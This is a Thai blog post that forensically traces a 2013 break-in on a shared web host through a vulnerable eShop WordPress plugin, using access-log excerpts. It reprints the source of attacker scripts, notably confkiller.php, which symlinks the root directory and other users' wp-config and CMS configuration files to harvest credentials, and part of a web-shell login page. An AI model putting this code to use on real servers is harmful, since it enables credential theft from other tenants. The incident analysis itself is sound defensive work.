Track anonymous hacker (Hacked WordPress with eShop Plugin)

จากบทความ [1], [2] Case Study: Web sites hacked, WordPress โดนแฮก และการแกะรอยแฮกเกอร์
คราวนี้มาดูรายละเอียดจาก access_log ไฟล์กันบ้างครับ

### –> START: ACCESS YOUR SITE ###

<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=2.0.4.1 HTTP/1.1" 200 5615<br />180.244.249.92 - - [28/May/2013:14:48:25 +0700] "GET /category/coffee/bean/ HTTP/1.1" 200 50899<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/slider.css HTTP/1.1" 200 2474<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/superfish.css HTTP/1.1" 200 3633<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/library/css/thickbox.css HTTP/1.1" 200 4014<br />180.244.249.92 - - [28/May/2013:14:48:27 +0700] "GET /wp-content/themes/อีช้อปปิ้ง/style.css HTTP/1.1" 200 35201<br />

### –> START ATTACKING ###
เปิดเว็บไซต์พาท /wp-content/themes/อีช้อปปิ้ง/upload/upload.php โดยใช่ช่องโหว่ของปลั๊กอิน จากนั้นแฮกเกอร์อัพโหลดไฟล์สคริปต์ (idca.php) ไฟล์นี้เข้ารหัสไว้มากกว่าหนึ่งฟังก์ชั่น
จากนั้นรันเรียกไฟล์สคริปต์ตามด้วยพาทที่ต้องการ (?y ดีฟอลล์พาทที่เก็บข้อมูลเว็บไซต์)

<br />180.244.249.92 - - [28/May/2013:14:48:47 +0700] "POST /wp-content/themes/อีช้อปปิ้ง/upload/upload.php?img=&amp;nonce= HTTP/1.1" 200 169<br />180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 4042<br />180.244.249.92 - - [28/May/2013:14:49:07 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -<br />180.244.249.92 - - [28/May/2013:14:49:08 +0700] "GET /wp-content/uploads/products_img/idca.php?favicon HTTP/1.1" 303 -<br />180.244.249.92 - - [28/May/2013:14:49:15 +0700] "POST /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961<br />180.244.249.92 - - [28/May/2013:14:49:21 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904<br />180.244.249.92 - - [28/May/2013:14:49:39 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/ HTTP/1.1" 200 19904<br />

### –> [1] END ATTACKED SUCCESS ###
พยายามเจาะไปเรื่อยๆ จนแฮกเกอร์สามารถเรียกฟังก์ชั่นอัพโหลดผ่านไฟล์สคริปต์ idca.php แล้วทำการอัพโหลดไฟล์สคริปต์อื่นเขาไปยังรูทไดเรกทอรีของโดเมนนั้นๆ 

<br />180.244.249.92 - - [28/May/2013:14:49:41 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/ HTTP/1.1" 200 27718<br />180.244.249.92 - - [28/May/2013:14:49:44 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:49:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880<br />180.244.249.92 - - [28/May/2013:14:49:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:49:59 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961<br />180.244.249.92 - - [28/May/2013:14:50:02 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 121198<br />180.244.249.92 - - [28/May/2013:14:50:05 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&amp;x=upload HTTP/1.1" 200 13665<br />180.244.249.92 - - [28/May/2013:14:50:10 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&amp;x=upload HTTP/1.1" 200 13730<br />180.244.249.92 - - [28/May/2013:14:50:54 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124263<br />180.244.249.92 - - [28/May/2013:14:51:07 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383<br />180.244.249.92 - - [28/May/2013:14:51:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 124383<br />180.244.249.92 - - [28/May/2013:14:51:18 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&amp;edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 12513<br />180.244.249.92 - - [28/May/2013:14:51:27 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&amp;edit=/var/www/html/โดเมน-B/httpd/html/ช้อป/newfile.php HTTP/1.1" 200 46661<br />

### –> [2] END ATTACKED SUCCESS ###
ดูเหมือนทำงานกันเป็นทีมเล็กๆ โดยพยายามเจาะเข้าหน้า admin ของ WordPress ด้วย

[Indonesian and Chaina]

<br />180.244.249.92 - - [28/May/2013:14:53:12 +0700] "GET /files.php HTTP/1.1" 200 2832<br />142.4.101.26 - - [28/May/2013:14:53:12 +0700] "GET /wp-login.php HTTP/1.0" 200 2245<br />

อัพโหลดไฟล์ files.php สำเร็จ

<br />180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202<br />142.4.101.26 - - [28/May/2013:14:53:13 +0700] "POST /wp-login.php HTTP/1.0" 302 -<br />180.244.249.92 - - [28/May/2013:14:53:14 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />

### –> [3] END ATTACKED SUCCESS ###
อัพโหลดไฟล์เพิ่มเติม confkiller.php

<br />180.244.249.92 - - [28/May/2013:14:53:21 +0700] "GET /wp-content/uploads/products_img/idca.php HTTP/1.1" 200 1191961<br />180.244.249.92 - - [28/May/2013:14:53:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 129458<br />180.244.249.92 - - [28/May/2013:14:53:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&amp;x=upload HTTP/1.1" 200 13665<br />180.244.249.92 - - [28/May/2013:14:53:32 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&amp;x=upload HTTP/1.1" 200 13734<br />180.244.249.92 - - [28/May/2013:14:53:42 +0700] "POST /confkiller.php HTTP/1.1" 200 5422   #&lt;--Hacker: upload file name "files.php"<br />180.244.249.92 - - [28/May/2013:14:53:43 +0700] "POST /confkiller.php HTTP/1.1" 200 5243   #&lt;--Hacker: upload file name "confkiller.php"<br />

### –> [4] END ATTACKED SUCCESS ###
สั่งผ่านเว็บเบราว์เซอร์เรียกสคริปต์ไฟล์ confkiller.php ทำงาน

<br />180.244.249.92 - - [28/May/2013:14:53:45 +0700] "GET /INDISHELL/ HTTP/1.1" 200 705<br />
<br />180.244.249.92 - - [28/May/2013:14:54:09 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:11 +0700] "GET /confkiller.php HTTP/1.1" 200 4842<br />180.244.249.92 - - [28/May/2013:14:54:12 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/&amp;x=upload HTTP/1.1" 200 13665<br />180.244.249.92 - - [28/May/2013:14:54:15 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B/httpd/html/ช้อป/ HTTP/1.1" 200 136865<br />180.244.249.92 - - [28/May/2013:14:54:20 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:54:23 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:25 +0700] "GET /files.php?sws=passwd HTTP/1.1" 200 5520<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:26 +0700] "POST /files.php?sws=passwd&amp;save=1 HTTP/1.1" 200 21005<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:29 +0700] "GET /files.php?sws=sym HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:34 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=joomla HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:36 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=wp HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:37 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=vb HTTP/1.1" 200 2202<br />180.244.249.92 - - [28/May/2013:14:54:38 +0700] "GET /files.php?sws=read HTTP/1.1" 200 2600<br />180.244.249.92 - - [28/May/2013:14:54:41 +0700] "GET /files.php? HTTP/1.1" 200 2832<br />

เป็นอันเรียบร้อย หน้าหลักโฮมเพจ

### –> [5] START: ATTACK UNSUCCESSFUL ###
พยายามเจาะเข้าไปยังโดเมนที่เหลือต่อ

<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:48 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/ HTTP/1.1" 200 20880<br />**************<br />180.244.249.92 - - [28/May/2013:14:54:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/ HTTP/1.1" 200 30970<br />180.244.249.92 - - [28/May/2013:14:55:24 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678<br />180.244.249.92 - - [28/May/2013:14:55:52 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&amp;x=upload HTTP/1.1" 200 14128<br />180.244.249.92 - - [28/May/2013:14:55:57 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/&amp;x=upload HTTP/1.1" 200 14155<br />180.244.249.92 - - [28/May/2013:14:56:04 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678<br />180.244.249.92 - - [28/May/2013:14:56:15 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-B-A/httpd/html/ HTTP/1.1" 200 99678<br />180.244.249.92 - - [28/May/2013:14:56:51 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:56:55 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/ HTTP/1.1" 200 17516<br />180.244.249.92 - - [28/May/2013:14:57:16 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/ HTTP/1.1" 200 28180<br />180.244.249.92 - - [28/May/2013:14:57:26 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/ HTTP/1.1" 200 146442<br />180.244.249.92 - - [28/May/2013:14:57:31 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&amp;x=upload HTTP/1.1" 200 13852<br />180.244.249.92 - - [28/May/2013:14:57:37 +0700] "POST /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-C/httpd/html/&amp;x=upload HTTP/1.1" 200 13879<br />180.244.249.92 - - [28/May/2013:14:57:45 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/ HTTP/1.1" 200 22856<br />180.244.249.92 - - [28/May/2013:14:57:47 +0700] "GET /wp-content/uploads/products_img/idca.php?y=/var/www/html/โดเมน-D/ HTTP/1.1" 200 47166<br />

### –> END: ATTACK UNSUCCESSFUL ###
ไม่สำเร็จ นอนดีกว่า :- 

ตัวอย่าง ไฟล์สคริปต์ files.php

<br />@mkdir('sym',0777);<br />$htcs  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";<br />$f [email protected] ('sym/.htaccess','w');<br />fwrite($f , $htcs);<br /><br />@symlink("/","sym/root");<br /><br />$pg = basename(__FILE__);<br /><br /><%%KEEPWHITESPACE%%> ////////// WordPress ////////////<br /><br />$pos = strpos($wp, "200");<br />$config="&amp;nbsp;";<br /><br />if (strpos($wp, "200") == true )<br />{<br /><%%KEEPWHITESPACE%%> $config="&lt;a href='".$wpl."' target='_blank'&gt;Wordpress&lt;/a&gt;";<br />}<br />elseif (strpos($wp12, "200") == true)<br />{<br /><%%KEEPWHITESPACE%%>  $config="&lt;a href='".$wp2."' target='_blank'&gt;Wordpress&lt;/a&gt;";<br />}<br />

ตัวอย่าง ไฟล์สคริปต์ confkiller.php

<br />&lt;?php<br /><%%KEEPWHITESPACE%%>	error_reporting(0);<br /><%%KEEPWHITESPACE%%>	echo "&lt;font color=red size=2 face=\"comic sans ms\"&gt;";<br /><%%KEEPWHITESPACE%%>	if(isset($_POST['su']))<br /><%%KEEPWHITESPACE%%>	{<br /><%%KEEPWHITESPACE%%>	mkdir('Indishell',0777);<br />$rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";<br />$g = fopen('Indishell/.htaccess','w');<br />fwrite($g,$rr);<br />$indishell = symlink("/","Indishell/root");<br /><%%KEEPWHITESPACE%%>		    $rt="&lt;a href=Indishell/root&gt;&lt;font color=white size=3 face=\"comic sans ms\"&gt; OwN3d&lt;/font&gt;&lt;/a&gt;";<br /><%%KEEPWHITESPACE%%>        echo "Bhai ji .... check link given below for / folder symlink &lt;br&gt;&lt;u&gt;$rt&lt;/u&gt;";<br /><br /><%%KEEPWHITESPACE%%>		$dir=mkdir('INDISHELL',0777);<br /><%%KEEPWHITESPACE%%>		$r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";<br /><%%KEEPWHITESPACE%%>        $f = fopen('INDISHELL/.htaccess','w');<br /><br /><%%KEEPWHITESPACE%%>        fwrite($f,$r);<br /><%%KEEPWHITESPACE%%>        $consym="&lt;a href=INDISHELL/&gt;&lt;font color=white size=3 face=\"comic sans ms\"&gt;configuration files&lt;/font&gt;&lt;/a&gt;";<br /><%%KEEPWHITESPACE%%>       	echo "&lt;br&gt;The link given below for configuration file symlink...open it, once processing finish &lt;br&gt;&lt;u&gt;&lt;font color=red size=2 face=\"comic sans ms\"&gt;$consym&lt;/font&gt;&lt;/u&gt;";<br /><br /><%%KEEPWHITESPACE%%>       		$usr=explode("\n",$_POST['user']);<br /><%%KEEPWHITESPACE%%>       	$configuration=array("wp-config.php","wordpress/wp-config.php","configuration.php","blog/wp-config.php","joomla/configuration.php","vb/includes/config.php","includes/config.php","conf_global.php","inc/config.php","config.php","Settings.php","sites/default/settings.php","whm/configuration.php","whmcs/configuration.php","support/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","support/configuration.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configuration.php","billing/configuration.php","admin/config.php");<br /><%%KEEPWHITESPACE%%>		foreach($usr as $uss )<br /><%%KEEPWHITESPACE%%>		{<br /><%%KEEPWHITESPACE%%>			$us=trim($uss);<br /><br /><%%KEEPWHITESPACE%%>			foreach($configuration as $c)<br /><%%KEEPWHITESPACE%%>			{<br /><%%KEEPWHITESPACE%%>			 $rs="/home/".$us."/public_html/".$c;<br /><%%KEEPWHITESPACE%%>			 $r="INDISHELL/".$us." .. ".$c;<br /><%%KEEPWHITESPACE%%>			 symlink($rs,$r);<br /><br /><%%KEEPWHITESPACE%%>		}<br /><br /><%%KEEPWHITESPACE%%>			}<br /><br /><%%KEEPWHITESPACE%%>		}<br /><br /><%%KEEPWHITESPACE%%>	?&gt;<br />

ตัวอย่าง ไฟล์สคริปต์ idca.php (Decoded ออกมาแล้ว by unphp.net)

<br />&lt;form method="post"&gt;<br /><br /><%%KEEPWHITESPACE%%>	&lt;a href="?error"&gt;&lt;img src="?favicon" style="margin:2px;vertical-align:middle;" /&gt;&lt;/a&gt;<br /><br />&lt;span class="gaya"&gt;[email protected]:~#&lt;/span&gt;&lt;input id="login" class="inputz" type="password" name="pass" style="width:120px;" value="" /&gt;<br /><br /><%%KEEPWHITESPACE%%>	&lt;input class="inputzbut" type="submit" value="Go !" name="submitlogin" style="width:80px;" /&gt;<br /><br /><%%KEEPWHITESPACE%%>	&lt;/form&gt;<br /><br /><%%KEEPWHITESPACE%%>	&lt;/div&gt;<br /><br />&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;<br /><br />&lt;form method=post&gt;<br /><br />&lt;p class="footer"&gt;./Cyber404 | Mr-GanDrunX &amp;copy;2013&lt;/p&gt;<br /><br />&lt;/form&gt;<br />

สรุป คือแฮกเกอร์พยายามเจาะเข้าระบบทุกโดเมนบนเว็บโฮตส์ติ้ง แต่แฮกได้เฉพาะผู้ที่ใช้ eShop WordPress Plugin แล้วทำการเปลี่ยนแปลงข้อมูลหน้าโฮมเพจ
และทำลิงก์แสดงข้อมูลไดร์เรกทอรีของระบบ การตรวจสอบเบื้องต้นไม่พบว่ามีข้อมูลสำคัญหลุดออกไป ช่องโหว่เกิดจากเครื่องมือ eShop และแฮกเกอร์ไม่ได้ใช้ทางช่องโหว่ของ WordPress (แต่ผู้ต้องอัพเดท WordPress ไปเป็นเวอร์ชั่นล่าสุด)

 

2 Responses to Track anonymous hacker (Hacked WordPress with eShop Plugin)

  1. อุ้ม says:

    ขอบคุณมากๆ สำหรับความรู้ดีๆที่ละเอียดยิบแบบนี้ค่ะ ปลั๊กอินน่ากลัวจังเลย

  2. SONTAYA says:

    ปลั๊กอินมี bug แค่นั้นครับ ปลั๊กดีๆ มีประโยชน์ก็เยอะ

    10 ปลั๊กอินดีๆ สำหรับ WordPress (WordPress SEO plugin to optimize your site)
    //blog.susethailand.com/?p=2860

Leave a Reply

Your email address will not be published. Required fields are marked *

Please validate : * Time limit is exhausted. Please reload CAPTCHA.